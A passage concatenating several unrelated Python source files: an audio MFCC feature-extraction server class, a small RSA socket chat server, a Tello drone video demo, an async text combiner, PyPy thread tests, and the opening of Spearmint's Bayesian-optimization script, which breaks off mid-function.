"speech" by the vad are saved if True, all features are saved and
a label file is produced
"""
def __init__(
self,
input_dir=None,
feature_id=None,
config=None,
sampling_frequency=None,
lower_frequency=None,
higher_frequency=None,
linear_filters=None,
log_filters=None,
window_size=None,
shift=None,
ceps_number=None,
snr=None,
vad=None,
feat_norm=None,
log_e=None,
dct_pca=False,
dct_pca_config=None,
sdc=False,
sdc_config=None,
delta=None,
double_delta=None,
delta_filter=None,
rasta=None,
keep_all_features=None,
spec=False,
mspec=False,
mask=None
):
""" Process of extracting the feature frames (LFCC or MFCC) from an audio signal.
Speech Activity Detection, MFCC (or LFCC) extraction and normalization.
Can include RASTA filtering, Short Term Gaussianization, MVN and delta
computation.
:param input_dir: directory where to find the audio files.
Default is ./
:param input_file_extension: extension of the audio files to read.
Default is 'sph'.
:param label_dir: directory where to store label files is required.
Default is ./
:param label_file_extension: extension of the label files to create.
Default is '.lbl'.
:param configuration file : 'diar_16k', 'sid_16k', 'diar_8k' or 'sid_8k'
"""
self.input_dir = './'
self.from_file = 'audio'
self.feature_id = 'ceps'
self.sampling_frequency = 8000
self.lower_frequency = 0
self.higher_frequency = self.sampling_frequency / 2.
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = False
self.dct_pca = False
self.dct_pca_config = (12, 12, None)
self.sdc = False
self.sdc_config = (1, 3, 7)
self.delta = False
self.double_delta = False
self.delta_filter = np.array([.25, .5, .25, 0, -.25, -.5, -.25])
self.mask = None
self.rasta = False
self.keep_all_features = False
self.spec = False
self.mspec = False
self.single_channel_extension = ['']
self.double_channel_extension = ['_a', '_b']
# If a predefined config is chosen, apply it
if config == 'diar_16k':
self._config_diar_16k()
elif config == 'diar_8k':
self._config_diar_8k()
elif config == 'sid_8k':
self._config_sid_8k()
elif config == 'sid_16k':
self._config_sid_16k()
elif config == 'fb_8k':
self._config_fb_8k()
elif config is None:
pass
else:
raise Exception('unknown configuration value')
# Manually entered parameters are applied
if input_dir is not None:
self.input_dir = input_dir
if feature_id is not None:
self.feature_id = feature_id
if sampling_frequency is not None:
self.sampling_frequency = sampling_frequency
if lower_frequency is not None:
self.lower_frequency = lower_frequency
if higher_frequency is not None:
self.higher_frequency = higher_frequency
if linear_filters is not None:
self.linear_filters = linear_filters
if log_filters is not None:
self.log_filters = log_filters
if window_size is not None:
self.window_size = window_size
if shift is not None:
self.shift = shift
if ceps_number is not None:
self.ceps_number = ceps_number
if snr is not None:
self.snr = snr
if vad is not None:
self.vad = vad
if feat_norm is not None:
self.feat_norm = feat_norm
if log_e is not None:
self.log_e = log_e
if dct_pca is not None:
self.dct_pca = dct_pca
if dct_pca_config is not None:
self.dct_pca_config = dct_pca_config
if sdc is not None:
self.sdc = sdc
if sdc_config is not None:
self.sdc_config = sdc_config
if delta is not None:
self.delta = delta
if double_delta is not None:
self.double_delta = double_delta
if delta_filter is not None:
self.delta_filter = delta_filter
if mask is not None:
self.mask = mask
if rasta is not None:
self.rasta = rasta
if keep_all_features is not None:
self.keep_all_features = keep_all_features
if spec:
self.spec = True
if mspec:
self.mspec = True
self.cep = []
self.label = []
self.show = 'empty'
self.audio_filename = 'empty'
root, ext = os.path.splitext(self.input_dir)
if ext == '.hdf5' or ext == '.h5':
self.from_file = 'hdf5'
def __repr__(self):
ch = '\t show: {} keep_all_features: {} from_file: {}\n'.format(self.show, self.keep_all_features, self.from_file)
ch += '\t inputDir: {} \n'.format(self.input_dir)
ch += '\t lower_frequency: {} higher_frequency: {} \n'.format(self.lower_frequency, self.higher_frequency)
ch += '\t sampling_frequency: {} '.format(self.sampling_frequency)
ch += '\t linear_filters: {} or log_filters: {} \n'.format(self.linear_filters, self.log_filters)
ch += '\t ceps_number: {} window_size: {} shift: {} \n'.format(self.ceps_number, self.window_size, self.shift)
ch += '\t vad: {} snr: {} \n'.format(self.vad, self.snr)
ch += '\t feat_norm: {} rasta: {} \n'.format(self.feat_norm, self.rasta)
ch += '\t log_e: {} delta: {} double_delta: {} \n'.format(self.log_e, self.delta, self.double_delta)
return ch
def _config_diar_16k(self):
"""
12 MFCC + E, no normalization
"""
self.sampling_frequency = 16000
self.lower_frequency = 133.3333
self.higher_frequency = 6855.4976
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = True
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
def _config_diar_8k(self):
"""
12 MFCC + E, no normalization
"""
self.sampling_frequency = 8000
self.lower_frequency = None
self.higher_frequency = None
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = True
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
def _config_sid_16k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 16000
self.lower_frequency = 133.3333
self.higher_frequency = 6855.4976
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = 'snr'
self.feat_norm = 'cmvn'
self.log_e = True
self.delta = True
self.double_delta = True
self.rasta = True
self.keep_all_features = False
def _config_sid_8k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 8000
self.lower_frequency = 200
self.higher_frequency = 3800
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = 'snr'
self.feat_norm = 'cmvn'
self.log_e = True
self.delta = True
self.double_delta = True
self.rasta = True
self.keep_all_features = False
def _config_fb_8k(self):
"""
19 MFCC + E + D + DD, normalization cmvn
"""
self.sampling_frequency = 8000
self.lower_frequency = 300
self.higher_frequency = 3400
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 0
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = False
self.delta = False
self.double_delta = False
self.rasta = False
self.keep_all_features = True
self.mspec = True
def _config_lid_8k_sdc(self):
"""
7 MFCC + 1 - 3 - 7 SDC
"""
self.sampling_frequency = 8000
self.lower_frequency = 300
self.higher_frequency = 3400
self.linear_filters = 0
self.log_filters = 24
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 7
self.snr = 40
self.vad = 'snr'
self.feat_norm = None
self.log_e = False
self.delta = False
self.double_delta = False
self.sdc = True
self.sdc_config = (1, 3, 7)
self.rasta = False
self.keep_all_features = False
def _features(self, show):
cep = None
label = None
window_sample = int(self.window_size * self.sampling_frequency)
shift_sample = int(self.shift * self.sampling_frequency)
audio_filename = self.input_dir.format(s=show)
logging.debug('--> ' + audio_filename)
if not os.path.isfile(audio_filename):
logging.error('%s %s', audio_filename, show)
raise IOError('File ' + audio_filename + ' not found')
logging.info('read audio')
x, rate = read_audio(audio_filename, self.sampling_frequency)
if rate != self.sampling_frequency:
raise "file rate don't match the rate of the feature server configuration"
self.audio_filename = audio_filename
logging.info('size of signal: %f len %d type size %d', x.nbytes / 1024 / 1024, len(x), x.nbytes / len(x))
if x.ndim == 1:
x = x[:, np.newaxis]
for i in range(0, 200, 5):
print('==> ', i, x[i:i + 5])
channel_ext = []
channel_nb = x.shape[1]
np.random.seed(0)
#x[:, 0] += 0.0001 * numpy.random.randn(x.shape[0])
if channel_nb == 1:
channel_ext.append('')
# Random noise is added to the input signal to avoid zero frames.
elif channel_nb == 2:
channel_ext.append('_a')
channel_ext.append('_b')
#x[:, 1] += 0.0001 * numpy.random.randn(x.shape[0])
# Process channels one by one
for chan, chan_ext in enumerate(channel_ext):
l = x.shape[0]
dec = shift_sample * 250 * 25000 + window_sample
dec2 = window_sample - shift_sample
start = 0
end = min(dec, l)
while start < l - dec2:
# if end < l:
logging.info('process part : %f %f %f', start / self.sampling_frequency, end / self.sampling_frequency, l / self.sampling_frequency)
tmp = self._features_chan(show, channel_ext, x[start:end, chan])
if cep is None:
cep = []
label = []
cep.append(tmp[0])
label.append(tmp[1])
else:
cep.append(tmp[0])
label.append(tmp[1])
start = end - dec2
end = min(end + dec, l)
if cep[-1].shape[0] > 0:
logging.info('!! size of signal cep: %f len %d type size %d', cep[-1].nbytes / 1024 / 1024, len(cep[-1]), cep[-1].nbytes / len(cep[-1]))
del x
# Smooth the cluster_list and fuse the channels if more than one.
logging.info('Smooth the cluster_list and fuse the channels if more than one')
if self.vad is not None:
label = label_fusion(label)
self._normalize(label, cep)
# Keep only the required features and save the appropriate files
# which are either feature files alone or feature and label files
if not self.keep_all_features:
logging.info('no keep all')
for chan, chan_ext in enumerate(channel_ext):
cep[chan] = cep[chan][label[chan]]
label[chan] = label[chan][label[chan]]
return cep, label
def _features_chan(self, show, channel_ext, x):
"""Compelete the overwhole process of extracting the feature frames
(LFCC or MFCC) from an audio signal.
Speech Activity Detection, MFCC (or LFCC) extraction and normalization.
Can include RASTA filtering, Short Term Gaussianization, MVN and delta
computation.
:param show: speaker of the file.
"""
# If the size of the signal is not enough for one frame, return zero features
if x.shape[0] < self.sampling_frequency * self.window_size:
cep_size = self.ceps_number * (1 + int(self.delta) + int(self.double_delta))\
+ int(self.mspec) * (self.linear_filters + self.log_filters)
cep = np.empty((0, cep_size))
label = np.empty((0, 1))
# Extract cepstral coefficients
else:
c = mfcc(
x,
fs=self.sampling_frequency,
lowfreq=self.lower_frequency,
maxfreq=self.higher_frequency,
nlinfilt=self.linear_filters,
nwin=self.window_size,
nlogfilt=self.log_filters,
nceps=self.ceps_number,
get_spec=self.spec,
get_mspec=self.mspec
)
print('test MFCC: cep', c[0][0:5, :])
print('test MFCC: e', c[1][0:5])
if self.ceps_number == 0 and self.mspec:
cep = c[3]
label = self._vad(c[1], x, channel_ext, show)
else:
label = self._vad(c[1], x, channel_ext, show)
cep = self._log_e(c)
cep, label = self._rasta(cep, label)
if self.delta or self.double_delta:
cep = self._delta_and_2delta(cep)
elif self.dct_pca:
cep = pca_dct(cep, self.dct_pca_config[0], self.dct_pca_config[1], self.dct_pca_config[2])
elif self.sdc:
cep = shifted_delta_cepstral(cep, d=self.sdc_config[0], P=self.sdc_config[1], k=self.sdc_config[2])
return cep, label
def _log_e(self, c):
"""If required, add the log energy as last coefficient"""
if self.log_e:
logging.info('keep log_e')
return np.hstack((c[1][:, np.newaxis], c[0]))
else:
logging.info('don\'t keep c0')
return c[0]
def _vad(self, logEnergy, x, channel_ext, show):
"""
Apply Voice Activity Detection.
:param x:
:param channel:
:param window_sample:
:param channel_ext:
:param show:
:return:
"""
label = None
if self.vad is None:
logging.info('no vad')
label = np.array([True] * logEnergy.shape[0])
elif self.vad == 'snr':
logging.info('vad : snr')
window_sample = int(self.window_size * self.sampling_frequency)
label = vad_snr(x, self.snr, fs=self.sampling_frequency, shift=self.shift, nwin=window_sample)
elif self.vad == 'energy':
logging.info('vad : energy')
label = vad_energy(logEnergy, distribNb=3, nbTrainIt=8, flooring=0.0001, ceiling=1.5, alpha=0.1)
else:
logging.warning('Wrong VAD type')
return label
def _rasta(self, cep, label):
"""
Performs RASTA filtering if required.
The two first frames are copied from the third to keep
the length consistent
!!! if vad is None: label[] is empty
:param channel: speaker of the channel
:return:
"""
if self.rasta:
logging.info('perform RASTA %s', self.rasta)
cep = rasta_filt(cep)
cep[:2, :] = cep[2, :]
label[:2] = label[2]
return cep, label
def _delta_and_2delta(self, cep):
"""
Add deltas and double deltas.
:param cep: a matrix of cepstral cefficients
:return: the cepstral coefficient stacked with deltas and double deltas
"""
if self.delta:
logging.info('add delta')
delta = compute_delta(cep, filt=self.delta_filter)
cep = np.column_stack((cep, delta))
if self.double_delta:
logging.info('add delta delta')
double_delta = compute_delta(delta, filt=self.delta_filter)
cep = np.column_stack((cep, double_delta))
return cep
def _normalize(self, label, cep):
"""
Normalize features in place
:param label:
:return:
"""
# Perform feature normalization on the entire session.
if self.feat_norm is None:
logging.info('no normalization')
pass
elif self.feat_norm == 'cms':
logging.info('cms normalization')
for chan, c in enumerate(cep):
cms(cep[chan], label[chan])
elif self.feat_norm == 'cmvn':
logging.info('cmvn normalization')
for chan, c in enumerate(cep):
cmvn(cep[chan], label[chan])
elif self.feat_norm == 'stg':
logging.info('stg normalization')
for chan, c in enumerate(cep):
stg(cep[chan], label=label[chan])
elif self.feat_norm == 'cmvn_sliding':
logging.info('sliding cmvn normalization')
for chan, c in enumerate(cep):
cep_sliding_norm(cep[chan], win=301, center=True, reduce=True)
elif self.feat_norm == 'cms_sliding':
logging.info('sliding cms normalization')
for chan, c in enumerate(cep):
cep_sliding_norm(cep[chan], win=301, center=True, reduce=False)
else:
logging.warning('Wrong feature normalisation type')
def load(self, show, id=None):
"""
Load a cep from audio or mfcc file. This method loads all channels
available in the file.
:param show: the speaker of the show to load
:return: the cep array and the label array
"""
# test if features is already computed
if self.show == show:
return self.cep, self.label
self.show = show
if self.from_file == 'audio':
logging.debug('compute MFCC: ' + show)
logging.debug(self.__repr__())
self.cep, self.label = self._features(show)
elif self.from_file == 'hdf5':
logging.debug('load hdf5: ' + show)
input_filename = self.input_dir.format(s=show)
with h5py.File(input_filename, "r") as hdf5_input_fh:
logging.debug('*** ' + input_filename + ' ' + show)
vad = True
if self.vad is None:
vad = False
cep, label = read_hdf5(hdf5_input_fh, show, feature_id=self.feature_id, label=vad)
self.cep = [cep]
if label is None:
self.label = [np.array([True] * self.cep[0].shape[0])]
else:
self.label = [label]
else:
raise Exception('unknown from_file value')
if self.mask is not None:
self.cep[0] = self._mask(self.cep[0])
if not self.keep_all_features:
logging.debug('!!! no keep all feature !!!')
self.cep[0] = self.cep[0][self.label[0]]
self.label[0] = [np.array([True] * self.cep[0].shape[0])]
return self.cep, self.label
def _mask(self, cep):
"""
keep only the MFCC index present in the filter list
:param cep:
:return: return the list of MFCC given by filter list
"""
if len(self.mask) == 0:
raise Exception('filter list is empty')
logging.debug('applied mask')
return cep[:, self.mask]
def save(self, show, filename, mfcc_format, and_label=True):
"""
Save the cep array in file
:param show: the speaker of the show to save (loaded if need)
:param filename: the file speaker of the mffc file or a list of 2 filenames
for the case of double channel files
:param mfcc_format: format of the mfcc file taken in values
['pickle', 'spro4', 'htk']
:param and_label: boolean, if True save label files
:raise: Exception if feature format is unknown
"""
self.load(show)
hdf5_ouput_fh = h5py.File(filename, "w")
logging.debug('save hdf5: ' + show)
#write_hdf5(show, fh, feat, feat_type='ceps', label=None )
write_hdf5(show, hdf5_ouput_fh, self.cep[0], label=self.label[0])
hdf5_ouput_fh.close()
@process_parallel_lists
def save_list(self, audio_file_list, feature_file_list, mfcc_format, feature_dir, feature_file_extension, and_label=False, numThread=1):
"""
Function that takes a list of audio files and extract features
:param audio_file_list: an array of string containing the speaker of the feature
files to load
:param feature_file_list: list of feature files to save, should correspond to the input audio_file_list
:param mfcc_format: format of the feature files to save, could be spro4, htk, pickle
:param feature_dir: directory where to save the feature files
:param feature_file_extension: extension of the feature files to save
:param and_label: boolean, if True save the label files
:param numThread: number of parallel process to run
"""
logging.info(self)
for audio_file, feature_file in zip(audio_file_list, feature_file_list):
cep_filename = os.path.join(feature_dir, feature_file + feature_file_extension)
self.save(audio_file, cep_filename, mfcc_format, and_label)
def dim(self):
if self.show != 'empty':
return self.cep[0].shape[1]
dim = self.ceps_number
if self.log_e:
dim += 1
if self.delta:
dim *= 2
if self.double_delta:
dim *= 2
logging.warning('cep dim computed using featureServer parameters')
return dim
def save_parallel(self, input_audio_list, output_feature_list, mfcc_format, feature_dir, feature_file_extension, and_label=False, numThread=1):
"""
Extract features from audio file using parallel computation
:param input_audio_list: an array of string containing the speaker
of the audio files to process
:param output_feature_list: an array of string containing the
speaker of the features files to save
:param mfcc_format: format of the output feature files, could be spro4, htk, pickle
:param feature_dir: directory where to save the feature files
:param feature_file_extension: extension of the feature files to save
:param and_label: boolean, if True save the label files
:param numThread: number of parallel process to run
"""
# Split the features to process for multi-threading
loa = np.array_split(input_audio_list, numThread)
lof = np.array_split(output_feature_list, numThread)
jobs = []
multiprocessing.freeze_support()
for idx, feat in enumerate(loa):
p = multiprocessing.Process(target=self.save_list, args=(loa[idx], lof[idx], mfcc_format, feature_dir, feature_file_extension, and_label))
jobs.append(p)
p.start()
for p in jobs:
p.join()
def _load_and_stack_worker(self, input_queue, output):
"""Load a list of feature files into a Queue object
:param input_queue: a Queue object
:param output: a list of Queue objects to fill
"""
while True:
next_task = input_queue.get()
if next_task is None:
# Poison pill means shutdown
output.put(None)
input_queue.task_done()
break
# check which channel to keep from the file
if next_task.endswith(self.double_channel_extension[0]) and (self.from_file == 'audio'):
next_task = next_task[:-len(self.double_channel_extension[0])]
output.put(self.load(next_task)[0][0])
if next_task.endswith(self.double_channel_extension[1]) and self.from_file == 'audio':
next_task = next_task[:-len(self.double_channel_extension[1])]
output.put(self.load(next_task)[0][1])
else:
cep = self.load(next_task)[0][0]
output.put(cep)
input_queue.task_done()
def load_and_stack(self, fileList, numThread=1):
"""Load a list of feature files and stack them in a unique ndarray.
The list of files to load is splited in sublists processed in parallel
:param fileList: a list of files to load
:param numThread: numbe of thead (optional, default is 1)
"""
queue_in = multiprocessing.JoinableQueue(maxsize=len(fileList) + numThread)
queue_out = []
# Start worker processes
jobs = []
for i in range(numThread):
queue_out.append(multiprocessing.Queue())
p = multiprocessing.Process(target=self._load_and_stack_worker, args=(queue_in, queue_out[i]))
jobs.append(p)
p.start()
# Submit tasks
for task in fileList:
queue_in.put(task)
for task in range(numThread):
queue_in.put(None)
# Wait for all the tasks to finish
queue_in.join()
output = []
for q in queue_out:
while True:
data = q.get()
if data is None:
break
output.append(data)
for p in jobs:
p.join()
all_cep = np.concatenate(output, axis=0)
return all_cep
def load_and_stack_threading(self, fileList, numThread=1):
"""Load a list of feature files and stack them in a unique ndarray.
The list of files to load is splited in sublists processed in parallel
:param fileList: a list of files to load
:param numThread: numbe of thead (optional, default is 1)
"""
queue_in = multiprocessing.JoinableQueue(maxsize=len(fileList) + numThread)
queue_out = []
# Start worker processes
jobs = []
for i in range(numThread):
queue_out.append(Queue.Queue())
p = threading.Thread(target=self._load_and_stack_worker, args=(queue_in, queue_out[i]))
jobs.append(p)
p.start()
# Submit tasks
for task in fileList:
queue_in.put(task)
for task in range(numThread):
queue_in.put(None)
# Wait for all the tasks to finish
queue_in.join()
output = []
for q in queue_out:
while True:
data = q.get()
if data is None:
break
output.append(data)
for p in jobs:
p.join()
all_cep = np.concatenate(output, axis=0)
return all_cep
def mean_std(self, filename):
feat = self.load(filename)[0][0]
return feat.shape[0], feat.sum(axis=0), np.sum(feat**2, axis=0)
|
server.py
|
#!/usr/bin/python3
import socket
import threading
from Crypto.PublicKey import RSA
class Server:
def __init__(self):
self.PORT = 1423
self.PUBLIC_TEXT = "Baglandi."
self.CODING = "ISO-8859-1"
self.TEXTCODE = "UTF-8"
self.sock = socket.socket()
self.sock.bind(('', self.PORT))
self.sock.listen()
self.clients = []
threading.Thread(target=self.invite).start()
def start_listen(self,client):
while True:
data = self.listen(client.socket)
if data == '':
continue
ad = data.split(':')[0]
veri = ''.join(data.split(':')[1:]).encode(self.CODING)
try:
outer_key = RSA.importKey(veri)
print("Public Key Alındı...")
client.set_key(outer_key,ad)
except:
self.send(veri,client,ad)
def encode(self, text):
try:
return text.encode(self.TEXTCODE)
except UnicodeEncodeError:
return text.encode(self.CODING)
def send(self,data,client,target=None):
sender = self.find_sender(target)
veri = sender.key.encrypt(self.encode(client.name)+ b'->' + data, b'')[0]
for user in self.clients:
if user.name == client.name:
continue
user.send(veri)
def find_sender(self,name):
for client in self.clients:
if client.name == name:
return client
def invite(self):
while True:
conn,add = self.sock.accept()
client = Client(conn,add)
self.clients.append(client)
print("Kullanıcı katıldı.")
threading.Thread(target=self.start_listen, args=(client,)).start()
def listen(self,connection):
data = connection.recv(16384).decode(self.CODING)
return data
class Client:
def __init__(self,connection,address):
self.socket = connection
self.key = None
self.name = None
self.address = address
def set_key(self,key,ad):
if self.key != None:
return
self.key = key
self.name = ad
def send(self,data):
self.socket.send(data)
server = Server()
|
vc.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
#
# Modified by MPS
#
import threading
import socket
import time
import cv2
host = ''
port = 9000
locaddr = (host, port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print('\nExit . . . RECV\n')
break
print('\r\n\r\nTello Python3 Demo.\r\n')
print('Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print('end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
sock.sendto(b'command', tello_address)
print('command ok')
time.sleep(0.5)
sock.sendto(b'streamon', tello_address)
print('stream on')
time.sleep(1)
sock.close()
cap = cv2.VideoCapture("udp://%s:%s?overrun_nonfatal=1&fifo_size=50000000" % ('192.168.10.1', '11111'))
print('start cap')
while True:
try:
ret, frame = cap.read()
if ret:
cv2.imshow('tello', cv2.resize(frame, (360, 240)))
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
cap.release()
print('\nExit . . .\n')
break
|
combine.py
|
import os
import time
import glob
import asyncio
import aiofiles
import multiprocessing as mp
async def write_major(major_queue:mp.Queue):
async with aiofiles.open("Major_Notes.txt", "w") as txt_write:
while True:
# queue.get() is already block
txt_str = major_queue.get()
if txt_str == "END":
break
await txt_write.write(txt_str)
print("Complete Major Notes Processing")
async def write_minor(minor_queue:mp.Queue):
async with aiofiles.open("Minor_Notes.txt", "w") as txt_write:
while True:
# queue.get() is already block
txt_str = minor_queue.get()
if txt_str == "END":
break
await txt_write.write(txt_str)
print("Complete Minor Notes Processing")
async def read_txt(pid:int, txt_files:list, major_queue:mp.Queue, minor_queue:mp.Queue):
num_files = len(txt_files)
if pid == 0:
process_files = txt_files[:num_files//2]
elif pid == 1:
process_files = txt_files[num_files//2:]
else:
print("Code designed only for 2 processes to read txt files")
exit(0)
for txt_file in process_files:
txt_str = ""
try:
async with aiofiles.open(txt_file, "r") as txt_read:
mood = await txt_read.readline()
txt_str = await txt_read.read()
if mood == "major\n":
major_queue.put(txt_str)
elif mood == "minor\n":
minor_queue.put(txt_str)
else:
print("Read Skipped ! " + txt_file)
continue
except:
print("Read Failed ! " + txt_file)
continue
major_queue.put("END")
minor_queue.put("END")
def get_TXTpaths(current_folder:str):
os.chdir(current_folder)
txt_files = glob.glob("**/*.txt", recursive=True)
return txt_files
def process(func, *args):
asyncio.run(func(*args))
def read_seq(txt_files:list):
major_txt = ""
minor_txt = ""
for txt_file in txt_files:
txt_str = ""
try:
with open(txt_file, "r") as txt_read:
mood = txt_read.readline()
txt_str = txt_read.read()
if mood == "major\n":
major_txt += txt_str
elif mood == "minor\n":
minor_txt += txt_str
else:
print("Read Skipped ! " + txt_file)
continue
except:
print("Read Failed ! " + txt_file)
continue
with open("Major_Notes.txt", "w") as txt_write:
txt_write.write(major_txt)
with open("Minor_Notes.txt", "w") as txt_write:
txt_write.write(minor_txt)
def main():
current_folder = os.getcwd()
txt_files = get_TXTpaths(current_folder)
print("Start Parallel Combination !")
start_t = time.time()
major_queue = mp.Queue()
minor_queue = mp.Queue()
p1_read_txt = mp.Process(target=process, args=(read_txt, 0, txt_files, major_queue, minor_queue))
p2_read_txt = mp.Process(target=process, args=(read_txt, 1, txt_files, major_queue, minor_queue))
p3_write_major = mp.Process(target=process, args=(write_major, major_queue))
p4_write_minor = mp.Process(target=process, args=(write_minor, minor_queue))
processes = [p1_read_txt, p2_read_txt, p3_write_major, p4_write_minor]
for p in processes:
p.start()
for p in processes:
p.join()
print("End Parallel Combination in: {:.2f} sec!".format(time.time()-start_t))
print("Start Serial Combination !")
start_t = time.time()
read_seq(txt_files)
print("End Serial Combination in: {:.2f} sec!".format(time.time()-start_t))
if __name__ == "__main__":
main()
|
test_thread.py
|
import py
import thread
import threading
from pypy.module.thread.ll_thread import allocate_ll_lock
from pypy.module.cpyext.test.test_api import BaseApiTest
from pypy.module.cpyext.test.test_cpyext import AppTestCpythonExtensionBase
class TestPyThread(BaseApiTest):
def test_get_thread_ident(self, space, api):
results = []
def some_thread():
res = api.PyThread_get_thread_ident()
results.append((res, thread.get_ident()))
some_thread()
assert results[0][0] == results[0][1]
th = threading.Thread(target=some_thread, args=())
th.start()
th.join()
assert results[1][0] == results[1][1]
assert results[0][0] != results[1][0]
def test_acquire_lock(self, space, api):
assert hasattr(api, 'PyThread_acquire_lock')
lock = api.PyThread_allocate_lock()
assert api.PyThread_acquire_lock(lock, 1) == 1
assert api.PyThread_acquire_lock(lock, 0) == 0
api.PyThread_free_lock(lock)
def test_release_lock(self, space, api):
assert hasattr(api, 'PyThread_acquire_lock')
lock = api.PyThread_allocate_lock()
api.PyThread_acquire_lock(lock, 1)
api.PyThread_release_lock(lock)
assert api.PyThread_acquire_lock(lock, 0) == 1
api.PyThread_free_lock(lock)
class AppTestThread(AppTestCpythonExtensionBase):
def test_tls(self):
module = self.import_extension('foo', [
("create_key", "METH_NOARGS",
"""
return PyInt_FromLong(PyThread_create_key());
"""),
("test_key", "METH_O",
"""
int key = PyInt_AsLong(args);
if (PyThread_get_key_value(key) != NULL) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_set_key_value(key, (void*)123) < 0) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
if (PyThread_get_key_value(key) != (void*)123) {
PyErr_SetNone(PyExc_ValueError);
return NULL;
}
Py_RETURN_NONE;
"""),
])
key = module.create_key()
assert key > 0
# Test value in main thread.
module.test_key(key)
raises(ValueError, module.test_key, key)
# Same test, in another thread.
result = []
import thread, time
def in_thread():
try:
module.test_key(key)
raises(ValueError, module.test_key, key)
except Exception, e:
result.append(e)
else:
result.append(True)
thread.start_new_thread(in_thread, ())
while not result:
print "."
time.sleep(.5)
assert result == [True]
|
main.py
|
# Copyright (C) 2012 Jasper Snoek, Hugo Larochelle and Ryan P. Adams
#
# This code is written for research and educational purposes only to
# supplement the paper entitled
# "Practical Bayesian Optimization of Machine Learning Algorithms"
# by Snoek, Larochelle and Adams
# Advances in Neural Information Processing Systems, 2012
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import optparse
import tempfile
import datetime
import multiprocessing
import importlib
import time
import imp
import os
import sys
import re
import signal
import socket
try: import simplejson as json
except ImportError: import json
# TODO: this shouldn't be necessary when the project is installed like a normal
# python lib. For now though, this lets you symlink to supermint from your path and run it
# from anywhere.
sys.path.append(os.path.realpath(__file__))
from ExperimentGrid import *
from helpers import *
from runner import job_runner
# Use a global for the web process so we can kill it cleanly on exit
web_proc = None
# There are two things going on here. There are "experiments", which are
# large-scale things that live in a directory and in this case correspond
# to the task of minimizing a complicated function. These experiments
# contain "jobs" which are individual function evaluations. The set of
# all possible jobs, regardless of whether they have been run or not, is
# the "grid". This grid is managed by an instance of the class
# ExperimentGrid.
#
# The spearmint.py script can run in two modes, which reflect experiments
# vs jobs. When run with the --run-job argument, it will try to run a
# single job. This is not meant to be run by hand, but is intended to be
# run by a job queueing system. Without this argument, it runs in its main
# controller mode, which determines the jobs that should be executed and
# submits them to the queueing system.
def parse_args():
parser = optparse.OptionParser(usage="\n\tspearmint [options] <experiment/config.pb>")
parser.add_option("--max-concurrent", dest="max_concurrent",
help="Maximum number of concurrent jobs.",
type="int", default=1)
parser.add_option("--max-finished-jobs", dest="max_finished_jobs",
type="int", default=10000)
parser.add_option("--method", dest="chooser_module",
help="Method for choosing experiments [SequentialChooser, RandomChooser, GPEIOptChooser, GPEIOptChooser, GPEIperSecChooser, GPEIChooser]",
type="string", default="GPEIOptChooser")
parser.add_option("--driver", dest="driver",
help="Runtime driver for jobs (local, or sge)",
type="string", default="local")
parser.add_option("--method-args", dest="chooser_args",
help="Arguments to pass to chooser module.",
type="string", default="")
parser.add_option("--grid-size", dest="grid_size",
help="Number of experiments in initial grid.",
type="int", default=20000)
parser.add_option("--grid-seed", dest="grid_seed",
help="The seed used to initialize initial grid.",
type="int", default=1)
parser.add_option("--run-job", dest="job",
help="Run a job in wrapper mode.",
type="string", default="")
parser.add_option("--polling-time", dest="polling_time",
help="The time in-between successive polls for results.",
type="float", default=3.0)
parser.add_option("-w", "--web-status", action="store_true",
help="Serve an experiment status web page.",
dest="web_status")
parser.add_option("--port",
help="Specify a port to use for the status web interface.",
dest="web_status_port", type="int", default=0)
parser.add_option("--host",
help="Specify a host to use for the status web interface.",
dest="web_status_host", type="string", default=None)
parser.add_option("-v", "--verbose", action="store_true",
help="Print verbose debug output.")
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_help()
sys.exit(0)
return options, args
def get_available_port(portnum):
if portnum:
return portnum
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', portnum))
port = sock.getsockname()[1]
sock.close()
return port
def start_web_view(options, experiment_config, chooser):
'''Start the web view in a separate process.'''
from spearmint.web.app import app
port = get_available_port(options.web_status_port)
print "Using port: " + str(port)
if options.web_status_host:
print "Listening at: " + str(options.web_status_host)
app.set_experiment_config(experiment_config)
